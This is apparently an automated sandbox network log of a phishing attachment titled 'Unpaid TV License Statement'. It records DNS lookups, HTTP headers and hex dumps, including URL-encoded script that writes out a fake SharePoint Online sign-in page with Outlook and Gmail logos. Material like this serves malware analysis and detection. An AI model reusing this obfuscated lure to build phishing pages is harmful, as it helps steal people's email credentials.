                                                                                                Jan 8, 2025 07:22:49.350059986 CET1.1.1.1192.168.2.40x21e4No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 07:22:49.350824118 CET1.1.1.1192.168.2.40xba6dNo error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                Jan 8, 2025 07:22:50.071070910 CET1.1.1.1192.168.2.40x6846No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 07:22:50.071070910 CET1.1.1.1192.168.2.40x6846No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 07:22:50.071190119 CET1.1.1.1192.168.2.40x3c2eNo error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                Jan 8, 2025 07:22:50.168119907 CET1.1.1.1192.168.2.40x97a7No error (0)maxcdn.bootstrapcdn.com104.18.10.207A (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 07:22:50.168119907 CET1.1.1.1192.168.2.40x97a7No error (0)maxcdn.bootstrapcdn.com104.18.11.207A (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 07:22:50.168394089 CET1.1.1.1192.168.2.40x5d4dNo error (0)maxcdn.bootstrapcdn.com65IN (0x0001)false
                                                                                                Jan 8, 2025 07:22:50.409323931 CET1.1.1.1192.168.2.40x9d76No error (0)help.lafayette.eduforge.lafayette.eduCNAME (Canonical name)IN (0x0001)false
                                                                                                Jan 8, 2025 07:22:50.409323931 CET1.1.1.1192.168.2.40x9d76No error (0)forge.lafayette.edud37ofkz6jzc5jh.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                Jan 8, 2025 07:22:50.409323931 CET1.1.1.1192.168.2.40x9d76No error (0)d37ofkz6jzc5jh.cloudfront.net65.9.66.17A (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 07:22:50.409323931 CET1.1.1.1192.168.2.40x9d76No error (0)d37ofkz6jzc5jh.cloudfront.net65.9.66.7A (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 07:22:50.409323931 CET1.1.1.1192.168.2.40x9d76No error (0)d37ofkz6jzc5jh.cloudfront.net65.9.66.48A (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 07:22:50.409323931 CET1.1.1.1192.168.2.40x9d76No error (0)d37ofkz6jzc5jh.cloudfront.net65.9.66.32A (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 07:22:50.424539089 CET1.1.1.1192.168.2.40x8c29No error (0)help.lafayette.eduforge.lafayette.eduCNAME (Canonical name)IN (0x0001)false
                                                                                                Jan 8, 2025 07:22:50.424539089 CET1.1.1.1192.168.2.40x8c29No error (0)forge.lafayette.edud37ofkz6jzc5jh.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                Jan 8, 2025 07:22:50.655592918 CET1.1.1.1192.168.2.40xe58dNo error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                Jan 8, 2025 07:22:50.711380005 CET1.1.1.1192.168.2.40x83cfNo error (0)www.freepnglogos.comfreepnglogos.comCNAME (Canonical name)IN (0x0001)false
                                                                                                Jan 8, 2025 07:22:50.711380005 CET1.1.1.1192.168.2.40x83cfNo error (0)freepnglogos.com78.46.22.25A (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 07:22:50.719023943 CET1.1.1.1192.168.2.40xfe56No error (0)publishingblog.ch35.207.98.7A (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 07:22:51.701282978 CET1.1.1.1192.168.2.40xa3f5No error (0)www.freepnglogos.comfreepnglogos.comCNAME (Canonical name)IN (0x0001)false
                                                                                                Jan 8, 2025 07:22:51.701282978 CET1.1.1.1192.168.2.40xa3f5No error (0)freepnglogos.com78.46.22.25A (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 07:22:51.837029934 CET1.1.1.1192.168.2.40xa804No error (0)publishing.blog35.207.98.7A (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 07:22:52.009892941 CET1.1.1.1192.168.2.40xc37dNo error (0)help.lafayette.eduforge.lafayette.eduCNAME (Canonical name)IN (0x0001)false
                                                                                                Jan 8, 2025 07:22:52.009892941 CET1.1.1.1192.168.2.40xc37dNo error (0)forge.lafayette.edud37ofkz6jzc5jh.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                Jan 8, 2025 07:22:52.009892941 CET1.1.1.1192.168.2.40xc37dNo error (0)d37ofkz6jzc5jh.cloudfront.net65.9.66.17A (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 07:22:52.009892941 CET1.1.1.1192.168.2.40xc37dNo error (0)d37ofkz6jzc5jh.cloudfront.net65.9.66.7A (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 07:22:52.009892941 CET1.1.1.1192.168.2.40xc37dNo error (0)d37ofkz6jzc5jh.cloudfront.net65.9.66.48A (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 07:22:52.009892941 CET1.1.1.1192.168.2.40xc37dNo error (0)d37ofkz6jzc5jh.cloudfront.net65.9.66.32A (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 07:22:52.015331030 CET1.1.1.1192.168.2.40x7055No error (0)help.lafayette.eduforge.lafayette.eduCNAME (Canonical name)IN (0x0001)false
                                                                                                Jan 8, 2025 07:22:52.015331030 CET1.1.1.1192.168.2.40x7055No error (0)forge.lafayette.edud37ofkz6jzc5jh.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                Jan 8, 2025 07:22:52.029470921 CET1.1.1.1192.168.2.40x11faNo error (0)www.google.com65IN (0x0001)false
                                                                                                Jan 8, 2025 07:22:52.029495955 CET1.1.1.1192.168.2.40x8fc2No error (0)www.google.com142.250.74.196A (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 07:22:53.174721003 CET1.1.1.1192.168.2.40x375aNo error (0)publishing.blog35.207.98.7A (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 07:23:04.563410044 CET1.1.1.1192.168.2.40xdeaaNo error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                Jan 8, 2025 07:23:59.908014059 CET1.1.1.1192.168.2.40x12d3No error (0)www.freepnglogos.comfreepnglogos.comCNAME (Canonical name)IN (0x0001)false
                                                                                                Jan 8, 2025 07:23:59.908014059 CET1.1.1.1192.168.2.40x12d3No error (0)freepnglogos.com78.46.22.25A (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 07:23:59.935501099 CET1.1.1.1192.168.2.40xfdceNo error (0)publishing.blog35.207.98.7A (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 07:24:01.047842026 CET1.1.1.1192.168.2.40x12d9No error (0)www.freepnglogos.comfreepnglogos.comCNAME (Canonical name)IN (0x0001)false
                                                                                                Jan 8, 2025 07:24:01.047842026 CET1.1.1.1192.168.2.40x12d9No error (0)freepnglogos.com78.46.22.25A (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 07:24:01.183765888 CET1.1.1.1192.168.2.40x440cNo error (0)publishing.blog35.207.98.7A (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 07:24:04.279654980 CET1.1.1.1192.168.2.40x32e8No error (0)www.google.com142.250.184.228A (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 07:24:04.279956102 CET1.1.1.1192.168.2.40x84d8No error (0)www.google.com65IN (0x0001)false
                                                                                                • ucarecdn.com
                                                                                                • maxcdn.bootstrapcdn.com
                                                                                                • cdnjs.cloudflare.com
                                                                                                • help.lafayette.edu
                                                                                                • www.freepnglogos.com
                                                                                                • publishingblog.ch
                                                                                                • publishing.blog
                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                0192.168.2.449752151.101.2.1324434548C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2025-01-08 06:22:48 UTC692OUTGET /0ea13331-baa4-4d0c-ad3b-b947ff0fe42a/ HTTP/1.1
                                                                                                Host: ucarecdn.com
                                                                                                Connection: keep-alive
                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                sec-ch-ua-mobile: ?0
                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                Upgrade-Insecure-Requests: 1
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Sec-Fetch-Site: none
                                                                                                Sec-Fetch-Mode: navigate
                                                                                                Sec-Fetch-User: ?1
                                                                                                Sec-Fetch-Dest: document
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                2025-01-08 06:22:48 UTC589INHTTP/1.1 200 OK
                                                                                                Connection: close
                                                                                                Content-Length: 19660
                                                                                                Content-Type: text/html
                                                                                                Cache-Control: public, max-age=31556926, immutable
                                                                                                Content-Disposition: attachment; filename="Unpaid TV License Statement- Copy.html"
                                                                                                ETag: "e32470ac49fb092a5d9a74dce684bbec"
                                                                                                Last-Modified: Mon, 06 Jan 2025 18:45:04 GMT
                                                                                                Server: Uploadcare
                                                                                                X-Robots-Tag: noindex, nofollow, nosnippet, noarchive
                                                                                                Access-Control-Allow-Origin: *
                                                                                                Access-Control-Allow-Methods: HEAD, GET, OPTIONS
                                                                                                Access-Control-Expose-Headers: HEAD, GET, OPTIONS
                                                                                                Accept-Ranges: bytes
                                                                                                Age: 82173
                                                                                                Date: Wed, 08 Jan 2025 06:22:48 GMT
                                                                                                2025-01-08 06:22:48 UTC1378INData Raw: ef bb bf 3c 73 63 72 69 70 74 3e 0d 0a 3c 21 2d 2d 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 75 6e 65 73 63 61 70 65 28 22 25 30 41 25 33 43 25 32 31 64 6f 63 74 79 70 65 25 32 30 68 74 6d 6c 25 33 45 25 30 41 25 33 43 68 74 6d 6c 25 32 30 6c 61 6e 67 25 33 44 25 32 32 65 6e 25 32 32 25 33 45 25 30 41 25 33 43 68 65 61 64 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 74 69 74 6c 65 25 33 45 53 68 61 72 65 25 32 30 50 6f 69 6e 74 25 32 30 4f 6e 6c 69 6e 65 25 33 43 2f 74 69 74 6c 65 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 6d 65 74 61 25 32 30 63 68 61 72 73 65 74 25 33 44 25 32 32 75 74 66 2d 38 25 32 32 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 6d 65 74 61 25 32 30 6e 61 6d 65 25 33 44
                                                                                                Data Ascii: <script>...document.write(unescape("%0A%3C%21doctype%20html%3E%0A%3Chtml%20lang%3D%22en%22%3E%0A%3Chead%3E%0A%20%20%20%20%3Ctitle%3EShare%20Point%20Online%3C/title%3E%0A%20%20%20%20%3Cmeta%20charset%3D%22utf-8%22%3E%0A%20%20%20%20%3Cmeta%20name%3D
                                                                                                2025-01-08 06:22:48 UTC1378INData Raw: 32 32 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 25 33 41 25 32 30 75 72 6c 25 32 38 25 32 37 68 74 74 70 73 25 33 41 2f 2f 70 75 62 6c 69 73 68 69 6e 67 62 6c 6f 67 2e 63 68 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 31 35 2f 30 33 2f 42 69 6c 64 73 63 68 69 72 6d 66 6f 74 6f 2d 32 30 31 35 2d 30 33 2d 31 38 2d 75 6d 2d 31 36 2e 35 38 2e 30 30 2e 70 6e 67 25 32 37 25 32 39 25 33 42 25 32 30 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 25 33 41 25 32 30 63 6f 76 65 72 25 33 42 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 25 33 41 25 32 30 6e 6f 2d 72 65 70 65 61 74 25 33 42 25 32 32 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 64 69 76 25 32 30 63 6c 61 73 73 25 33 44
                                                                                                Data Ascii: 22background-image%3A%20url%28%27https%3A//publishingblog.ch/wp-content/uploads/2015/03/Bildschirmfoto-2015-03-18-um-16.58.00.png%27%29%3B%20background-size%3A%20cover%3Bbackground-repeat%3A%20no-repeat%3B%22%3E%0A%20%20%20%20%20%20%20%20%3Cdiv%20class%3D
                                                                                                2025-01-08 06:22:48 UTC1378INData Raw: 2d 33 25 32 32 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 64 69 76 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 72 6f 77 25 32 32 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 64 69 76 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 63 6f 6c 2d 6c 67 2d 31 32 25 32 32 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 61 25 32 30 68 72 65 66 25 33 44 25 32 32 6a
                                                                                                Data Ascii: -3%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cdiv%20class%3D%22row%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cdiv%20class%3D%22col-lg-12%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Ca%20href%3D%22j
                                                                                                2025-01-08 06:22:48 UTC1378INData Raw: 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 69 6d 67 25 32 30 73 72 63 25 33 44 25 32 32 68 74 74 70 73 25 33 41 2f 2f 77 77 77 2e 66 72 65 65 70 6e 67 6c 6f 67 6f 73 2e 63 6f 6d 2f 75 70 6c 6f 61 64 73 2f 6d 69 63 72 6f 73 6f 66 74 2d 6f 66 66 69 63 65 2d 70 6e 67 2d 6c 6f 67 6f 2f 6d 69 63 72 6f 73 6f 66 74 2d 6f 75 74 6c 6f 6f 6b 2d 70 6e 67 2d 6c 6f 67 6f 2d 31 2e 70 6e 67 25 32 32 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 69 6d 67 2d 66 6c 75 69 64 25 32 32 25 32 30 77 69 64 74 68 25 33 44 25 32 32 34 30 70 78 25 32 32 25 32 30 73 74 79 6c 65 25 33 44 25 32 32 25 32 30 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 25 33 41 25 32 30 72 67 62 61 25 32 38 30 25 32
                                                                                                Data Ascii: 20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cimg%20src%3D%22https%3A//www.freepnglogos.com/uploads/microsoft-office-png-logo/microsoft-outlook-png-logo-1.png%22%20class%3D%22img-fluid%22%20width%3D%2240px%22%20style%3D%22%20background-color%3A%20rgba%280%2
                                                                                                2025-01-08 06:22:48 UTC1378INData Raw: 33 33 31 34 35 39 42 25 33 42 25 32 32 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 2f 64 69 76 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 2f 61 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 2f 64 69 76 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25
                                                                                                Data Ascii: 331459B%3B%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C/div%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C/a%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C/div%3E%0A%20%20%20%20%20%20%
                                                                                                2025-01-08 06:22:48 UTC1378INData Raw: 30 25 32 30 25 32 30 25 32 30 25 33 43 2f 64 69 76 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 2f 61 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 2f 64 69 76 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 2f 64 69 76 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30
                                                                                                Data Ascii: 0%20%20%20%3C/div%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C/a%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C/div%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C/div%3E%0A%20%20%20%20%20%20%20%20%20%20%20
                                                                                                2025-01-08 06:22:48 UTC1378INData Raw: 72 67 65 74 25 33 44 25 32 32 25 32 33 61 6a 61 78 4d 6f 64 61 6c 25 32 32 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 64 69 76 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 25 32 30 6d 74 2d 32 25 32 32 25 32 30 73 74 79 6c 65 25 33 44 25 32 32 25 32 30 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 25 33 41 25 32 30 25 32 33 30 42 35 42 44 33 25 33 42 25 32 32 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32
                                                                                                Data Ascii: rget%3D%22%23ajaxModal%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cdiv%20class%3D%22%20mt-2%22%20style%3D%22%20background-color%3A%20%230B5BD3%3B%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2
                                                                                                2025-01-08 06:22:48 UTC1378INData Raw: 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 2f 64 69 76 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 2f 64 69 76 25 33 45 25 32 30 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 2f 64 69 76 25 33 45 25 30 41 25
                                                                                                Data Ascii: 20%20%20%20%20%20%20%20%20%20%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C/div%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C/div%3E%20%0A%20%20%20%20%20%20%20%20%20%20%20%20%3C/div%3E%0A%
                                                                                                2025-01-08 06:22:48 UTC1378INData Raw: 25 32 30 25 32 30 25 32 30 25 33 43 69 6d 67 25 32 30 69 64 25 33 44 25 32 32 66 69 65 6c 64 49 6d 67 25 32 32 25 32 30 73 72 63 25 33 44 25 32 32 68 74 74 70 73 25 33 41 2f 2f 77 77 77 2e 66 72 65 65 70 6e 67 6c 6f 67 6f 73 2e 63 6f 6d 2f 75 70 6c 6f 61 64 73 2f 67 6d 61 69 6c 2d 65 6d 61 69 6c 2d 6c 6f 67 6f 2d 70 6e 67 2d 31 32 2e 70 6e 67 25 32 32 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 69 6d 67 2d 66 6c 75 69 64 25 32 30 72 6f 75 6e 64 65 64 2d 63 69 72 63 6c 65 25 32 32 25 32 30 77 69 64 74 68 25 33 44 25 32 32 34 30 70 78 25 32 32 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 68 35 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 6d 6f 64 61 6c 2d
                                                                                                Data Ascii: %20%20%20%3Cimg%20id%3D%22fieldImg%22%20src%3D%22https%3A//www.freepnglogos.com/uploads/gmail-email-logo-png-12.png%22%20class%3D%22img-fluid%20rounded-circle%22%20width%3D%2240px%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Ch5%20class%3D%22modal-
                                                                                                2025-01-08 06:22:48 UTC1378INData Raw: 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 2f 64 69 76 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 2f 64 69 76 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 64 69 76 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 63 6f 6c 2d 6c 67 2d 31 32 25 32 32 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 64 69 76 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 66 6f 72 6d 2d 67 72 6f 75 70 25 32 32 25 33 45
                                                                                                Data Ascii: 20%20%20%20%20%20%20%20%3C/div%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C/div%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cdiv%20class%3D%22col-lg-12%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cdiv%20class%3D%22form-group%22%3E


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                1192.168.2.449756104.18.10.2074434548C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2025-01-08 06:22:49 UTC538OUTGET /bootstrap/4.5.2/css/bootstrap.min.css HTTP/1.1
                                                                                                Host: maxcdn.bootstrapcdn.com
                                                                                                Connection: keep-alive
                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                sec-ch-ua-mobile: ?0
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                Accept: text/css,*/*;q=0.1
                                                                                                Sec-Fetch-Site: cross-site
                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                Sec-Fetch-Dest: style
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                2025-01-08 06:22:49 UTC953INHTTP/1.1 200 OK
                                                                                                Date: Wed, 08 Jan 2025 06:22:49 GMT
                                                                                                Content-Type: text/css; charset=utf-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                CDN-PullZone: 252412
                                                                                                CDN-Uid: b1941f61-b576-4f40-80de-5677acb38f74
                                                                                                CDN-RequestCountryCode: US
                                                                                                Vary: Accept-Encoding
                                                                                                Access-Control-Allow-Origin: *
                                                                                                Cache-Control: public, max-age=31919000
                                                                                                ETag: W/"816af0eddd3b4822c2756227c7e7b7ee"
                                                                                                Last-Modified: Mon, 25 Jan 2021 22:04:11 GMT
                                                                                                CDN-ProxyVer: 1.06
                                                                                                CDN-RequestPullSuccess: True
                                                                                                CDN-RequestPullCode: 200
                                                                                                CDN-CachedAt: 11/22/2024 23:02:21
                                                                                                CDN-EdgeStorageId: 1067
                                                                                                timing-allow-origin: *
                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                X-Content-Type-Options: nosniff
                                                                                                CDN-Status: 200
                                                                                                CDN-RequestTime: 0
                                                                                                CDN-RequestId: f0f367f8553ee51ead58d22773d59027
                                                                                                CDN-Cache: HIT
                                                                                                CF-Cache-Status: HIT
                                                                                                Age: 1311112
                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8fea1869d80f41ba-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2025-01-08 06:22:49 UTC416INData Raw: 37 62 66 39 0d 0a 2f 2a 21 0a 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 34 2e 35 2e 32 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 2f 29 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 32 30 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 32 30 20 54 77 69 74 74 65 72 2c 20 49 6e 63 2e 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 69 6e 2f 4c 49 43 45 4e 53 45 29 0a 20 2a 2f 3a 72 6f 6f 74 7b 2d 2d 62 6c 75 65 3a 23 30 30 37 62 66 66 3b 2d 2d 69 6e 64 69 67 6f 3a 23 36 36 31 30 66
                                                                                                Data Ascii: 7bf9/*! * Bootstrap v4.5.2 (https://getbootstrap.com/) * Copyright 2011-2020 The Bootstrap Authors * Copyright 2011-2020 Twitter, Inc. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE) */:root{--blue:#007bff;--indigo:#6610f
